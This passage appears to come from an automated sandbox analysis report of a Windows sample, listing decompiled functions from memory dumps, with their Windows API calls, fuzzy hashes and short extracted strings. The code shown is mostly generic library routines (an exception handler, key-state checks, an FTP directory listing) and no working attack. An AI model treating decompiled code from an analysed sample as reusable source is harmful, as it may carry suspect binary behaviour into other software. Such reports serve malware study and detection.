				 *0x10058904 = cs;
				 *0x100588e0 = ds;
				 *0x100588dc = es;
				 *0x100588d8 = fs;
				 *0x100588d4 = gs;
				asm("pushfd");
				_pop( *0x10058908);
				 *0x100588fc =  *_t31;
				 *0x10058900 = _v0;
				 *0x1005890c =  &_a4;
				 *0x10058848 = 0x10001;
				_t11 =  *0x10058900; // 0x0
				 *0x100587fc = _t11;
				 *0x100587f0 = 0xc0000409;
				 *0x100587f4 = 1;
				_t12 =  *0x10031c30; // 0x1f496801
				_v812 = _t12;
				_t13 =  *0x10031c34; // 0xe0b697fe
				_v808 = _t13;
				 *0x10058840 = IsDebuggerPresent();
				_push(1);
				E10020443(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x100297e8);
				if( *0x10058840 == 0) {
					_push(1);
					E10020443(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x100127ff
0x100127ff
0x100127ff
0x100127ff
0x100127ff
0x100127ff
0x100127ff
0x10012805
0x10012807
0x10012807
0x100173b6
0x100173bb
0x100173c1
0x100173c7
0x100173cd
0x100173d3
0x100173d9
0x100173e0
0x100173e7
0x100173ee
0x100173f5
0x100173fc
0x10017403
0x10017404
0x1001740d
0x10017415
0x1001741d
0x10017428
0x10017432
0x10017437
0x1001743c
0x10017446
0x10017450
0x10017455
0x1001745b
0x10017460
0x1001746c
0x10017471
0x10017473
0x1001747b
0x10017486
0x10017493
0x10017495
0x10017497
0x1001749c
0x100174b0

APIs

IsDebuggerPresent.KERNEL32 ref: 10017466
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001747B
UnhandledExceptionFilter.KERNEL32(100297E8), ref: 10017486
GetCurrentProcess.KERNEL32(C0000409), ref: 100174A2
TerminateProcess.KERNEL32(00000000), ref: 100174A9

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: eeb3eeb98e8b37ca9c6cc6b43b493f018fb5e22de93ab4ae2f6d7633aaaaf4f6
Instruction ID: 403466e1c0413e081715fb1be00416084ab59b1416a59afc6745ee059036ff2f
Opcode Fuzzy Hash: eeb3eeb98e8b37ca9c6cc6b43b493f018fb5e22de93ab4ae2f6d7633aaaaf4f6
Instruction Fuzzy Hash: 1721F2B4412329DFE740DF15DCC9AA43BF4FB08304F90405AEA18A7361EB7097858F46

Uniqueness

Uniqueness Score: -1.00%

Function 04739886, Relevance: 6.6, Strings: 5, Instructions: 338COMMON

Download Yara Rule

Strings

;, xrefs: 0473999E, 04739A7B, 04739A6C
M1o, xrefs: 04739B25
tj5, xrefs: 04739C99
N, xrefs: 04739B75
;, xrefs: 04739A8A

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: M1o$tj5$;$;$N
API String ID: 0-1554260801
Opcode ID: 6e19bc361a654c700566e86b4621a0e785dfb7720ce9c018e1ae4be7374f75e2
Instruction ID: 2d73e050ba218c0f965d60d33efff7ca0d92111a23f359112c7682b95efb6eb5
Opcode Fuzzy Hash: 6e19bc361a654c700566e86b4621a0e785dfb7720ce9c018e1ae4be7374f75e2
Instruction Fuzzy Hash: 3A023FB15083819BD768CF25C58AA9FBBF1FBC0348F10891DF69A86261D7B5A548CF43

Uniqueness

Uniqueness Score: -1.00%

Function 047393A0, Relevance: 6.5, Strings: 5, Instructions: 260COMMON

Download Yara Rule

Strings

gX, xrefs: 047396CA
H6, xrefs: 047394BF
LN, xrefs: 04739411
\-, xrefs: 04739449
|\4, xrefs: 047395F5

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: H6$LN$\-$|\4$gX
API String ID: 0-2042227102
Opcode ID: ee5c0dc2d6505b62113d78bd75ced70bf888443204e709ed35db0a3ddd4c2c02
Instruction ID: 7c63964b4f078d69334998fddc9501234a6e2d0b66bdcbf326a933a775d7a0ae
Opcode Fuzzy Hash: ee5c0dc2d6505b62113d78bd75ced70bf888443204e709ed35db0a3ddd4c2c02
Instruction Fuzzy Hash: 02C141B11083819FD358CF26C48946BBBE1FBC9718F108A1DF6E696261D3B5DA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0472AFF0, Relevance: 6.5, Strings: 5, Instructions: 238COMMON

Download Yara Rule

Strings

1, xrefs: 0472B0FB
], xrefs: 0472B09E
!, xrefs: 0472B141
jw, xrefs: 0472B244
2G, xrefs: 0472B274

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 1$!$2G$]$jw
API String ID: 0-3165295256
Opcode ID: af721e48cb5c4119569c0a1fef2616faf2d762f78a4dd91773885257b69b0a21
Instruction ID: 5633c2fa46aa2657771398479a7a9eff27fd72c846f1cd595229bef7932def2e
Opcode Fuzzy Hash: af721e48cb5c4119569c0a1fef2616faf2d762f78a4dd91773885257b69b0a21
Instruction Fuzzy Hash: B0B13171508341DBD728CF25C68991BFBE1FBC8748F40891DF28A96261D7B6E948CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04727C10, Relevance: 6.5, Strings: 5, Instructions: 237COMMON

Download Yara Rule

Strings

j, xrefs: 04727D87
-z#, xrefs: 04727DCF
}|, xrefs: 04727DA5
g$, xrefs: 04727E15
ml(, xrefs: 04727F2D

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: -z#$g$$ml($}|$j
API String ID: 0-2561031247
Opcode ID: f682cab4a7d22a62cbb5d24c6eac7533001040379897ccd06abbfdbf594d9143
Instruction ID: 91a1e2dbaa62f5973b73a12a1bd5485e4eeafb28d9ca22d75d972d6cd74dfe11
Opcode Fuzzy Hash: f682cab4a7d22a62cbb5d24c6eac7533001040379897ccd06abbfdbf594d9143
Instruction Fuzzy Hash: 98C11CB14083819FC368CF65C58A90BBBF1BBC4748F108A1DF29696260D7B6DA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 04735406, Relevance: 6.5, Strings: 5, Instructions: 235COMMON

Download Yara Rule

Strings

sa, xrefs: 04735473
6$_1, xrefs: 047354FA, 04735506
6$_1, xrefs: 047356AD
ccy, xrefs: 0473542B
iQ, xrefs: 047354C3

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 6$_1$6$_1$ccy$iQ$sa
API String ID: 0-967154239
Opcode ID: a5840a168d5d1e670672d52da9c44aab079b58db9bb081ee0a1252166b4f4990
Instruction ID: 9ba62d8869f78bdfd54e729e6ab27a14bd45fd2e811feac8e56878818ac34724
Opcode Fuzzy Hash: a5840a168d5d1e670672d52da9c44aab079b58db9bb081ee0a1252166b4f4990
Instruction Fuzzy Hash: 52B143725083809FD354CF2AD58990BFBE1BBC8758F108A2DF59696260D3B5DA09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0473EF6D, Relevance: 6.4, Strings: 5, Instructions: 180COMMON

Download Yara Rule

Strings

G, xrefs: 0473F0EC
[", xrefs: 0473F130
oj, xrefs: 0473F0B5
&_)^, xrefs: 0473EFC0
MlT, xrefs: 0473F095

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: &_)^$MlT$["$oj$G
API String ID: 0-4224517581
Opcode ID: 4ab53094612d9f266e9f9912284a92794ed9e7fff93c6967b338fc0b5c1fc0f0
Instruction ID: 9f06cc57d6e9cf223999d7ad3c930f8537c80db1a6337d09ad54d309c19e030d
Opcode Fuzzy Hash: 4ab53094612d9f266e9f9912284a92794ed9e7fff93c6967b338fc0b5c1fc0f0
Instruction Fuzzy Hash: 9D8143715093419FC358DF21D98982FBBE1FBC8748F10491DF68696261D771AA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10009963, Relevance: 6.0, APIs: 4, Instructions: 42
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10009963(void* __ecx) {
				signed int _t5;
				void* _t15;
				void* _t18;

				_t15 = __ecx;
				if((E1000C324(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E10009498(_t15, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t18 = E10005329();
				if(_t18 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t18 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x10009968
0x10009974
0x100099bc
0x100099be
0x100099c5
0x00000000
0x100099c7
0x1000997b
0x1000997f
0x00000000
0x100099a2
0x100099b1
0x00000000
0x100099b9

APIs

Part of subcall function 1000C324: GetWindowLongA.USER32 ref: 1000C32F

GetKeyState.USER32(00000010), ref: 10009989
GetKeyState.USER32(00000011), ref: 10009992
GetKeyState.USER32(00000012), ref: 1000999B
SendMessageA.USER32 ref: 100099B1

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 18d45bb3ef255ec09f87bb89946454d458df3f7ef9ee5a53d3e93d886371022f
Instruction ID: 0815b709cc041f40244c7965587a043af36704caa94b0e1d64a150931e05ac3a
Opcode Fuzzy Hash: 18d45bb3ef255ec09f87bb89946454d458df3f7ef9ee5a53d3e93d886371022f
Instruction Fuzzy Hash: 26F0E93678025B66FE10B27C6D41FA61954DF80BD0F51043DBB81EA1DAEFA4C8021170

Uniqueness

Uniqueness Score: -1.00%

Function 0473D99C, Relevance: 5.2, Strings: 4, Instructions: 234COMMON

Download Yara Rule

Strings

W+O, xrefs: 0473DC4E
bH=, xrefs: 0473DA1E
[_, xrefs: 0473DBA8
/u0, xrefs: 0473DBC2

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: /u0$W+O$[_$bH=
API String ID: 0-998302245
Opcode ID: 6bdf50ed93da56d386b5cd9126f3d057966e8dd25c3f7c3480f2c1767f52673d
Instruction ID: 27503556b320e512d34967d98c408f10edcced15760ead90c32457f47cc921c6
Opcode Fuzzy Hash: 6bdf50ed93da56d386b5cd9126f3d057966e8dd25c3f7c3480f2c1767f52673d
Instruction Fuzzy Hash: 94B10C729093419FD324CF2AC58981BFBF1BBC5B98F10492DF59596260D3B1EA09CF82

Uniqueness

Uniqueness Score: -1.00%

Function 04734CF5, Relevance: 5.2, Strings: 4, Instructions: 233COMMON

Download Yara Rule

Strings

U+W, xrefs: 04734EE3
F}-, xrefs: 04734DEE
c, xrefs: 04734F7E
s, xrefs: 04734E10

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: F}-$U+W$c$s
API String ID: 0-3172396279
Opcode ID: 6b07524064cf2befd0d8d3396d35e09929c4a8436feb2020ed0e370917fffc9a
Instruction ID: 3650f2e120363753aa805ff21c9bd876d4241a2331e401f28f130ae1f8b489ec
Opcode Fuzzy Hash: 6b07524064cf2befd0d8d3396d35e09929c4a8436feb2020ed0e370917fffc9a
Instruction Fuzzy Hash: 94A12371108345AFC718CF22C98591BFBE2FBC4748F10891DF19686261D7B6AA09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0472F07C, Relevance: 5.2, Strings: 4, Instructions: 223COMMON

Download Yara Rule

Strings

", xrefs: 0472F116
ggo, xrefs: 0472F09E
ar, xrefs: 0472F1FC
ggo, xrefs: 0472F324

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ar$ggo$ggo$"
API String ID: 0-3790209349
Opcode ID: e0511419faf4b65ed2766471e7b66c90255073447c910471157f018334fa9df7
Instruction ID: e16425afd50efd764fd2eb3393567e9aa4fde7c71ba400f5cc9976ae0e697e42
Opcode Fuzzy Hash: e0511419faf4b65ed2766471e7b66c90255073447c910471157f018334fa9df7
Instruction Fuzzy Hash: 95A11071D00219EBDF18CFE9D98A9EEFBB1FB48314F248159E116BA260D3B45A45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04731F7B, Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

F:d, xrefs: 04732257
-6, xrefs: 0473202D
LF'X, xrefs: 0473224F
6, xrefs: 04732223

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 6$F:d$LF'X$-6
API String ID: 0-743620949
Opcode ID: 9490002af002a1287bd4f369aa938c25f4e9678a1b4b1574b9b8574fd645cc68
Instruction ID: f35c8a14a4c146ee2b6b9a45d7018243bf1786837785b2f313a2b2651edae0dd
Opcode Fuzzy Hash: 9490002af002a1287bd4f369aa938c25f4e9678a1b4b1574b9b8574fd645cc68
Instruction Fuzzy Hash: 09A15272908381AFD398CF65C98940BFBF2BBC5718F008A1DF1999A261D7B5D918CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0473AD26, Relevance: 5.2, Strings: 4, Instructions: 167COMMON

Download Yara Rule

Strings

ul, xrefs: 0473AE01
9}%, xrefs: 0473AD3E
B#, xrefs: 0473AE43
aUu, xrefs: 0473AEE7

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 9}%$B#$aUu$ul
API String ID: 0-3448433543
Opcode ID: cdb69923bc53ef80ba4dfb6ab59a8d8b4cb4038c2eba4f7a80c4c3cabdcd1335
Instruction ID: 8119ef164096deaeefc950fbe02045b420822240da975ffff6846bc2375b0084
Opcode Fuzzy Hash: cdb69923bc53ef80ba4dfb6ab59a8d8b4cb4038c2eba4f7a80c4c3cabdcd1335
Instruction Fuzzy Hash: 8D712FB2508341AFC768CF65C98A81FBBF1FBC4748F400A1DF19696221D3B6DA498B42

Uniqueness

Uniqueness Score: -1.00%

Function 100062E3, Relevance: 4.6, APIs: 3, Instructions: 125
filestringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E100062E3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t28;
				char* _t29;
				char* _t32;
				char* _t37;
				char* _t38;
				char* _t43;
				void* _t46;
				char* _t52;
				char* _t62;
				char* _t63;
				void* _t66;
				void* _t83;
				char* _t85;
				void* _t87;
				void* _t89;

				_t83 = __edx;
				_push(0);
				E10013978(E1002569E, __ebx, __edi, __esi);
				_t87 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x18)) != 0) {
					_t85 =  *(_t89 + 8);
					_t28 = lstrlenA(_t85);
					__eflags = _t28 - 0x104;
					if(_t28 >= 0x104) {
						goto L1;
					}
					E100049BA(_t87);
					_t32 = E10003B46(__eflags, 0x140);
					_pop(_t66);
					 *(_t87 + 8) = _t32;
					__eflags = _t32;
					if(_t32 == 0) {
						goto L1;
					}
					__eflags = _t85;
					if(_t85 == 0) {
						_t85 = 0x10027c6c;
					}
					E10005778(0x104, _t66, _t85, _t87,  &(_t32[0x2c]), 0x104, _t85, 0xffffffff);
					_t37 = FtpFindFirstFileA( *( *((intOrPtr*)(_t87 + 0x18)) + 4), _t85,  *(_t87 + 8),  *(_t89 + 0xc),  *(_t87 + 0x1c));
					 *(_t87 + 0xc) = _t37;
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E10015FDB(_t85, 0x10027c68);
						E10001C28(_t89 + 8);
						 *(_t89 - 4) =  *(_t89 - 4) & 0x00000000;
						E10006273( *((intOrPtr*)(_t87 + 0x18)), _t89 + 8);
						__eflags = _t38;
						if(_t38 != 0) {
							_t62 = E100160AE(_t85, 0x5c);
							_t43 = E100160AE(_t85, 0x2f);
							__eflags = _t43;
							if(_t43 == 0) {
								_t43 = _t85;
							}
							__eflags = _t62;
							if(_t62 == 0) {
								_t62 = _t85;
							}
							__eflags = _t43 - _t62;
							if(_t43 < _t62) {
								_t63 = _t62 - _t85;
								__eflags = _t63;
							} else {
								_t63 = _t43 - _t85;
							}
							__eflags = _t63;
							if(_t63 == 0) {
								__eflags = _t63;
							}
							_t88 = _t87 + 0x10;
							E10001CA4(_t87 + 0x10, _t85);
							_t46 = E10001CFC(_t87 + 0x10, _t89 + 0xc, _t63);
							 *(_t89 - 4) = 1;
							E10001C92(_t88, _t46);
							__eflags =  *(_t89 + 0xc) + 0xfffffff0;
							E100010A3( *(_t89 + 0xc) + 0xfffffff0, _t83);
						} else {
							_t52 = E10005A5A( *((intOrPtr*)(_t87 + 0x18)), _t85);
							__eflags = _t52;
							if(_t52 == 0) {
								E10001F8F(_t87 + 0x10, _t89 + 8);
							} else {
								E10006273( *((intOrPtr*)(_t87 + 0x18)), _t87 + 0x10);
								E10005A5A( *((intOrPtr*)(_t87 + 0x18)),  *(_t89 + 8));
							}
						}
						E100010A3( &(( *(_t89 + 8))[0xfffffffffffffff0]), _t83);
						_t29 = 1;
						__eflags = 1;
						L23:
						return E10013A50(_t29);
					} else {
						E100049BA(_t87);
						goto L1;
					}
				}
				L1:
				_t29 = 0;
				goto L23;
			}

0x100062e3
0x100062e3
0x100062ea
0x100062ef
0x100062f5
0x100062fe
0x10006302
0x1000630d
0x1000630f
0x00000000
0x00000000
0x10006313
0x1000631d
0x10006322
0x10006323
0x10006326
0x10006328
0x00000000
0x00000000
0x1000632a
0x1000632c
0x1000632e
0x1000632e
0x1000633b
0x10006354
0x1000635a
0x1000635d
0x1000635f
0x10006370
0x1000637c
0x10006384
0x1000638c
0x10006391
0x10006393
0x100063d4
0x100063d6
0x100063de
0x100063e0
0x100063e2
0x100063e2
0x100063e4
0x100063e6
0x100063e8
0x100063e8
0x100063ea
0x100063ec
0x100063f4
0x100063f4
0x100063ee
0x100063f0
0x100063f0
0x100063f6
0x100063f8
0x100063fa
0x100063fa
0x100063fb
0x10006401
0x1000640d
0x10006415
0x10006419
0x10006421
0x10006424
0x10006395
0x10006399
0x1000639e
0x100063a0
0x100063c2
0x100063a2
0x100063a9
0x100063b4
0x100063b4
0x100063a0
0x1000642f
0x10006436
0x10006436
0x10006437
0x1000643c
0x10006361
0x10006363
0x00000000
0x10006363
0x1000635f
0x100062f7
0x100062f7
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 100062EA
lstrlenA.KERNEL32(?,00000000,1000183B,?,80000000,?,00000001,1002B2E0), ref: 10006302
FtpFindFirstFileA.WININET(?,?,?,?,?), ref: 10006354

Part of subcall function 10015FDB: __mbspbrk_l.LIBCMT ref: 10015FE8

Part of subcall function 10006273: FtpGetCurrentDirectoryA.WININET(?,00000000,?), ref: 10006295

Part of subcall function 10005A5A: FtpSetCurrentDirectoryA.WININET(?,?), ref: 10005A65

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$FileFindFirstH_prolog3__mbspbrk_llstrlen
String ID:
API String ID: 3545823680-0
Opcode ID: 16fd8bdf20e593072a5ab5bb849102fd11c1e4a194addcb62b9b0ccf72701117
Instruction ID: 69dcf53ad665be2d09b6ebc60c3f8bd2dceb698a1bfc18f8bb6be73f6d467aaf
Opcode Fuzzy Hash: 16fd8bdf20e593072a5ab5bb849102fd11c1e4a194addcb62b9b0ccf72701117
Instruction Fuzzy Hash: CF41C375600701ABF711DBB4CC95EAF36EAEF482D0F204538F9468B29ADF70EA458791

Uniqueness

Uniqueness Score: -1.00%

Function 1000712B, Relevance: 4.5, APIs: 3, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000712B(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E10006FE3() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E100070DA( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x10058204(_a4, _a8);
			}

0x1000713a
0x1000714e
0x10007162
0x1000717a
0x10007164
0x1000716b
0x1000716b
0x10007182
0x00000000
0x10007184
0x00000000
0x1000718b
0x10007182
0x00000000
0x10007150
0x00000000

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d6324c6681860b479d2455eebbc832a0084a8d29da42df4738e6978f5ed395
Instruction ID: b85666518574f43f1378558a3f98a65d80fe01f22c2fdb2b7417dd0d32a5e03a
Opcode Fuzzy Hash: 66d6324c6681860b479d2455eebbc832a0084a8d29da42df4738e6978f5ed395
Instruction Fuzzy Hash: D2F01431900249EBEB41DF69CC489EE3BA9FF042C4B108020FD1D950A4DB38DA16EB51

Uniqueness

Uniqueness Score: -1.00%

Function 04725973, Relevance: 4.0, Strings: 3, Instructions: 249COMMON

Download Yara Rule

Strings

r, xrefs: 04725B0F
W, xrefs: 04725A2D
z, xrefs: 04725A73

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: r$z$W
API String ID: 0-3996472023
Opcode ID: 7d41293a5be0d6b0a3a201a1b8f9a2d4dd13bf43b7594102f930b672db8dbbf8
Instruction ID: 995819ba826a6d87ff151615fb0f294d93c96ebfe2b8410c475d1ebefeb3e210
Opcode Fuzzy Hash: 7d41293a5be0d6b0a3a201a1b8f9a2d4dd13bf43b7594102f930b672db8dbbf8
Instruction Fuzzy Hash: 65D13E71408781AFD7A8CF65C68990BFBE1FBC4718F508A0DF2D686260D3B59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0473E84B, Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

4+_, xrefs: 0473E954
xl, xrefs: 0473EA5D
o@i, xrefs: 0473E928

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 4+_$o@i$xl
API String ID: 0-1310443345
Opcode ID: abdef123869ad61581313523c5c29bad414062020f20328733d3e129e0252227
Instruction ID: 6d2ea910696df9c238944f1d67bf740237d6a88d66c3298c30e1ff018f6906cd
Opcode Fuzzy Hash: abdef123869ad61581313523c5c29bad414062020f20328733d3e129e0252227
Instruction Fuzzy Hash: D4A121728093819FC794DF25C98A80BFBF2BBC1718F404A1DF69656221D3B2D958CF82

Uniqueness

Uniqueness Score: -1.00%

Function 047313D7, Relevance: 3.9, Strings: 3, Instructions: 189COMMON

Download Yara Rule

Strings

W^, xrefs: 047313FC
rO, xrefs: 047314A1
2Qy, xrefs: 04731411

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: 2Qy$W^$rO
API String ID: 2591292051-2587551122
Opcode ID: 52d8cbc2f309a075413569c3feb3ca8079512b6169fbc2cd72709a62f4b45f94
Instruction ID: a7f525bd5e8e34b11300a0c53294a0bfe1ccacd8cbfe84741142e68b03454f06
Opcode Fuzzy Hash: 52d8cbc2f309a075413569c3feb3ca8079512b6169fbc2cd72709a62f4b45f94
Instruction Fuzzy Hash: 708132B1508380ABC358CF66C98581BBBF5FBC8758F905A2EF59696220D7B1DA448F43

Uniqueness

Uniqueness Score: -1.00%

